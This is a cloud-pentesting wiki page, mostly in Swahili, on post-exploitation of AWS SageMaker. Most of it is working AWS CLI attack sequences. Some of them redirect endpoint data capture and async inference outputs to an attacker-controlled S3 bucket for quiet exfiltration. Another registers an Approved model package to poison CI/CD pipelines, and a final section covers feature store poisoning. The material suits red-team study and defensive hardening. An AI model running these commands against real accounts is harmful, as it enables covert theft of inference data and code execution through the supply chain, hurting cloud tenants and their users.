AWS - SageMaker Post-Exploitation

Reading time: 8 minutes

SageMaker endpoint data siphon via UpdateEndpoint DataCaptureConfig

Tumia vibaya usimamizi wa endpoint wa SageMaker ili kuwezesha kurekodi kabisa request/response kwenye S3 bucket inayodhibitiwa na mtumiaji wenye nia mbaya bila kuigusa model au container. Inatumia zero/low‑downtime rolling update na inahitaji tu ruhusa za usimamizi wa endpoint.

Mahitaji

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: s3:CreateBucket (au tumia bucket iliyopo katika akaunti ile ile)
• Hiari (ikiwa unatumia SSE‑KMS): kms:Encrypt kwenye CMK iliyochaguliwa
• Lengo: Endpoint ya InService ya real‑time iliyopo katika akaunti/region ile ile

Hatua

1. Tambua endpoint ya InService na ukusanye variants za uzalishaji zilizopo sasa

REGION=${REGION:-us-east-1}
EP=$(aws sagemaker list-endpoints --region $REGION --query "Endpoints[?EndpointStatus=='InService']|[0].EndpointName" --output text)
echo "Endpoint=$EP"
CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
echo "EndpointConfig=$CFG"
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CFG" --query ProductionVariants > /tmp/pv.json

2. Andaa attacker S3 destination kwa captures

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-capture-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION

3. Unda EndpointConfig mpya ambayo inahifadhi variants zile zile lakini inawawezesha DataCapture kwenda kwenye attacker bucket

Kumbuka: Tumia aina za maudhui wazi ambazo zinakidhi uthibitishaji wa CLI.

NEWCFG=${CFG}-dc
cat > /tmp/dc.json << JSON
{
"EnableCapture": true,
"InitialSamplingPercentage": 100,
"DestinationS3Uri": "s3://$BUCKET/capture",
"CaptureOptions": [
{"CaptureMode": "Input"},
{"CaptureMode": "Output"}
],
"CaptureContentTypeHeader": {
"JsonContentTypes": ["application/json"],
"CsvContentTypes": ["text/csv"]
}
}
JSON
aws sagemaker create-endpoint-config \
--region $REGION \
--endpoint-config-name "$NEWCFG" \
--production-variants file:///tmp/pv.json \
--data-capture-config file:///tmp/dc.json

4. Tekeleza config mpya kwa rolling update (downtime mdogo/haipo)

aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

5. Tengeneza angalau wito mmoja wa inferensi (hiari ikiwa kuna trafiki ya moja kwa moja)

echo '{"inputs":[1,2,3]}' > /tmp/payload.json
aws sagemaker-runtime invoke-endpoint --region $REGION --endpoint-name "$EP" \
--content-type application/json --accept application/json \
--body fileb:///tmp/payload.json /tmp/out.bin || true

6. Thibitisha captures kwenye attacker S3

aws s3 ls s3://$BUCKET/capture/ --recursive --human-readable --summarize

Athari

• Uondoaji kamili wa payloads za maombi na majibu ya inference ya wakati halisi (na metadata) kutoka kwa endpoint lengwa kwenda kwenye S3 bucket inayodhibitiwa na mshambuliaji.
• Hakuna mabadiliko kwenye model/container image na mabadiliko tu ya ngazi ya endpoint, ikiruhusu njia ya wizi wa data kwa utulivu kwa kuingiliwa kidogo kwa uendeshaji.

SageMaker async inference output hijack via UpdateEndpoint AsyncInferenceConfig

Tumia udanganyifu wa usimamizi wa endpoint ili kuelekeza asynchronous inference outputs kwa S3 bucket inayodhibitiwa na mshambuliaji kwa ku-clone EndpointConfig ya sasa na kuweka AsyncInferenceConfig.OutputConfig S3OutputPath/S3FailurePath. Hii inaondoa utabiri za model (na ingizo lolote lililobadilishwa na container) bila kubadilisha model/container.

Mahitaji

• IAM: sagemaker:DescribeEndpoint, sagemaker:DescribeEndpointConfig, sagemaker:CreateEndpointConfig, sagemaker:UpdateEndpoint
• S3: Uwezo wa kuandika kwenye attacker S3 bucket (kwa kupitia model execution role au permissive bucket policy)
• Target: Endpoint iliyoko InService ambapo asynchronous invocations zimetumika (au zitatumika)

Hatua

1. Kusanya ProductionVariants za sasa kutoka kwa endpoint lengwa

REGION=${REGION:-us-east-1}
EP=<target-endpoint-name>
CUR_CFG=$(aws sagemaker describe-endpoint --region $REGION --endpoint-name "$EP" --query EndpointConfigName --output text)
aws sagemaker describe-endpoint-config --region $REGION --endpoint-config-name "$CUR_CFG" --query ProductionVariants > /tmp/pv.json

2. Unda attacker bucket (hakikisha model execution role inaweza PutObject ndani yake)

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-async-exfil-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION || true

3. Clone EndpointConfig na hijack AsyncInference outputs kwa attacker bucket

NEWCFG=${CUR_CFG}-async-exfil
cat > /tmp/async_cfg.json << JSON
{"OutputConfig": {"S3OutputPath": "s3://$BUCKET/async-out/", "S3FailurePath": "s3://$BUCKET/async-fail/"}}
JSON
aws sagemaker create-endpoint-config --region $REGION   --endpoint-config-name "$NEWCFG"   --production-variants file:///tmp/pv.json   --async-inference-config file:///tmp/async_cfg.json
aws sagemaker update-endpoint --region $REGION --endpoint-name "$EP" --endpoint-config-name "$NEWCFG"
aws sagemaker wait endpoint-in-service --region $REGION --endpoint-name "$EP"

4. Zindua async invocation na thibitisha objects zinapofika kwenye S3 ya mshambuliaji

aws s3 cp /etc/hosts s3://$BUCKET/inp.bin
aws sagemaker-runtime invoke-endpoint-async --region $REGION --endpoint-name "$EP" --input-location s3://$BUCKET/inp.bin >/tmp/async.json || true
sleep 30
aws s3 ls s3://$BUCKET/async-out/ --recursive || true
aws s3 ls s3://$BUCKET/async-fail/ --recursive || true

Impact

• Inaelekeza matokeo ya inference isiyo-synchronous (na miili ya makosa) kwenda S3 inayodhibitiwa na mshambuliaji, ikiaruhusu uondokanaji wa siri wa utabiri na, kwa njia ya uwezekano, maingizo nyeti yaliyotengenezwa kabla/baada ya usindikaji na container, bila kubadilisha code au image ya model na kwa downtime ndogo/ya kutokuwepo.

SageMaker Model Registry kuingizwa kwa mnyororo wa usambazaji kupitia CreateModelPackage(Approved)

Iwapo mshambuliaji anaweza CreateModelPackage kwenye lengo la SageMaker Model Package Group, anaweza kusajili toleo jipya la model linaloelekeza kwenye image ya container inayodhibitiwa na mshambuliaji na kuiweka kuwa Approved mara moja. Mifumo mingi ya CI/CD hu-auto-deploy toleo ziliotangazwa Approved kwa endpoints au training jobs, jambo ambalo linaweza kusababisha utekelezaji wa code ya mshambuliaji chini ya execution roles za huduma. Kufichuliwa kwa cross-account kunaweza kuongezwa na sera ya rasilimali ya ModelPackageGroup isiyofungwa (permissive).

Requirements

• IAM (minimum to poison an existing group): sagemaker:CreateModelPackage kwenye ModelPackageGroup lengwa
• Optional (to create a group if one doesn’t exist): sagemaker:CreateModelPackageGroup
• S3: Ufikiaji wa kusoma kwenye referenced ModelDataUrl (au kuhost artifacts zinazodhibitiwa na mshambuliaji)
• Target: Model Package Group ambayo automation ya downstream inaiangalia kwa toleo Approved

Steps

1. Weka region na unda/pata Model Package Group lengwa

REGION=${REGION:-us-east-1}
MPG=victim-group-$(date +%s)
aws sagemaker create-model-package-group --region $REGION --model-package-group-name $MPG --model-package-group-description "test group"

2. Andaa data ya mfano ya bandia kwenye S3

ACC=$(aws sts get-caller-identity --query Account --output text)
BUCKET=ht-sm-mpkg-$ACC-$(date +%s)
aws s3 mb s3://$BUCKET --region $REGION
head -c 1024 </dev/urandom > /tmp/model.tar.gz
aws s3 cp /tmp/model.tar.gz s3://$BUCKET/model/model.tar.gz --region $REGION

3. Sajili toleo la kifurushi cha modeli kilichoidhinishwa chenye madhumuni mabaya (hapa ni isiyo hatari) kikirejea kwenye picha ya umma ya AWS DLC image

IMG="683313688378.dkr.ecr.$REGION.amazonaws.com/sagemaker-scikit-learn:1.2-1-cpu-py3"
cat > /tmp/inf.json << JSON
{
"Containers": [
{
"Image": "$IMG",
"ModelDataUrl": "s3://$BUCKET/model/model.tar.gz"
}
],
"SupportedContentTypes": ["text/csv"],
"SupportedResponseMIMETypes": ["text/csv"]
}
JSON
aws sagemaker create-model-package --region $REGION   --model-package-group-name $MPG   --model-approval-status Approved   --inference-specification file:///tmp/inf.json

4. Thibitisha toleo jipya la Approved lipo

aws sagemaker list-model-packages --region $REGION --model-package-group-name $MPG --output table

Athari

• Poison the Model Registry with an Approved version that references attacker-controlled code. Pipelines that auto-deploy Approved models may pull and run the attacker image, yielding code execution under endpoint/training roles.
• With a permissive ModelPackageGroup resource policy (PutModelPackageGroupPolicy), this abuse can be triggered cross-account.

Feature store poisoning

Abuse sagemaker:PutRecord on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with sagemaker:GetRecord, an attacker can read sensitive features. This does not require access to models or endpoints.

{{#ref}} feature-store-poisoning.md {{/ref}}